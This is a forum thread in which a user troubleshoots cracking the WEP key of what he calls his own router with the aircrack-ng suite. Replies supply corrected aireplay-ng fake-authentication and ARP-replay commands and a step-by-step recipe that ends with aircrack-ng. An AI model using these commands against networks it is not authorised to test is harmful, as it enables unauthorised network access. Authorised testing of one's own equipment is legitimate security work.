Results 1 to 7 of 7

Thread: troubleshooting aircrack-ng

  1. #1
    Join Date
    2013-May
    Posts
    7

    troubleshooting aircrack-ng

    Hello all, I got a WEP wireless network configures on the kitchen and I'm trying to break it in my bedroom.

    I'm using kali linux, and AWUS036nhr alfa card.

    I've seen more than 20 different tutorials but with no lucky..

    as you can see here
    http://imageshack.com/a/img23/1829/oytr.jpg

    any thoughts on what am I doing wrong?

    steps used:
    airmon-ng start wlan0
    airodump-ng mon0
    airodump-ng -w wep -c 6 --bssid 00:1F:C6:F4:44:11 mon0 (mac address of my router)

    (other window)
    aireplay-ng -1 0 -a 00:1F:C6:F4:44:11 mon0
    aireplay-ng -3 -b 00:1F:C6:F4:44:11 mon0

    (other window)
    aircrack-ng wep-01.cap
    I've tryed with more than 25000 IV's and got no lucky..

  2. #2
    you miss a client MAC. it can't get a handshake if there is no client.
    Where is the darn "any key" key?

  3. #3
    Join Date
    2013-May
    Posts
    7
    Quote Originally Posted by thepoor View Post
    you miss a client MAC. it can't get a handshake if there is no client.
    in the aireplay commands?

    should be
    aireplay-ng -1 0 -a 00:1F:C6:F4:44:11 -h 00:04:05:06:07:08 mon0
    aireplay-ng -3 -b 00:1F:C6:F4:44:11 -h 00:04:05:06:07:08 mon0

    where -h is the MAC of the connected client?

    Thank you

  4. #4
    Join Date
    2013-Mar
    Posts
    354
    Agree with thepoor.
    You are missing some parameters (alfa usb) in aireplay-ng...You should refer to aircrack-ng home page.

  5. #5
    Join Date
    2013-May
    Posts
    7
    Quote Originally Posted by maverik35 View Post
    Agree with thepoor.
    You are missing some parameters (alfa usb) in aireplay-ng...You should refer to aircrack-ng home page.
    which parameters are you talking about?!
    I've seen a bunch of tutorials and no one told me about them..

    are you talking about this?!
    Step 4 - Use aireplay-ng to do a fake authentication with the access point

    In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.

    The lack of association with the access point is the single biggest reason why injection fails. Remember the golden rule: The MAC you use for injection must be associated with the AP by either using fake authentication or using a MAC from an already-associated client.

    To associate with an access point, use fake authentication:

    aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
    Where:

    -1 means fake authentication
    0 reassociation timing in seconds
    -e teddy is the wireless network name
    -a 00:14:6C:7E:40:80 is the access point MAC address
    -h 00:0F:B5:88:AC:82 is our card MAC address
    ath0 is the wireless interface name
    thank you

  6. #6
    Join Date
    2014-Feb
    Posts
    3
    I've been able to crack WEP many times with no associated clients after some trial and error. You need to fake authenticate first:
    1. aireplay-ng -1 0 -a 00:1F:C6:F4:44:11 -h 00:04:05:06:07:08 mon0 ---if this doesn't work then try aireplay-ng -1 6000 -o 1 -q 10 -a 00:1F:C6:F4:44:11 -h 00:04:05:06:07:08 mon0
    If first command doesn't authenticate, the second one usually works. You might need to try it a 2-3 times before it works
    2. aireplay-ng -3 -b 00:1F:C6:F4:44:11 -h 00:04:05:06:07:08 mon0 --Just let this run, sometimes it takes 30 seconds for the arp requests to start working
    3. Once you start getting arp requests just let it run until aircrack cracks it
    When I am attacking WEP I usually use airodump-ng --ivs -w filename -c # --bssid so the aircrack-ng command would be:
    aircrack-ng filename*.ivs filename*.cap

  7. #7
    Join Date
    2013-May
    Posts
    7
    Quote Originally Posted by mrtom82 View Post
    I've been able to crack WEP many times with no associated clients after some trial and error. You need to fake authenticate first:
    1. aireplay-ng -1 0 -a 00:1F:C6:F4:44:11 -h 00:04:05:06:07:08 mon0 ---if this doesn't work then try aireplay-ng -1 6000 -o 1 -q 10 -a 00:1F:C6:F4:44:11 -h 00:04:05:06:07:08 mon0
    If first command doesn't authenticate, the second one usually works. You might need to try it a 2-3 times before it works
    2. aireplay-ng -3 -b 00:1F:C6:F4:44:11 -h 00:04:05:06:07:08 mon0 --Just let this run, sometimes it takes 30 seconds for the arp requests to start working
    3. Once you start getting arp requests just let it run until aircrack cracks it
    When I am attacking WEP I usually use airodump-ng --ivs -w filename -c # --bssid so the aircrack-ng command would be:
    aircrack-ng filename*.ivs filename*.cap
    I'll give it a try and then let you know. Cheers!

Similar Threads

  1. Troubleshooting alt+tab
    By suki in forum TroubleShooting Archive
    Replies: 0
    Last Post: 2022-01-17, 20:56
  2. troubleshooting
    By trungtuyhoa in forum TroubleShooting Archive
    Replies: 0
    Last Post: 2020-02-14, 09:21
  3. Troubleshooting MySQL
    By carmeloojr in forum TroubleShooting Archive
    Replies: 0
    Last Post: 2016-12-12, 16:05

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •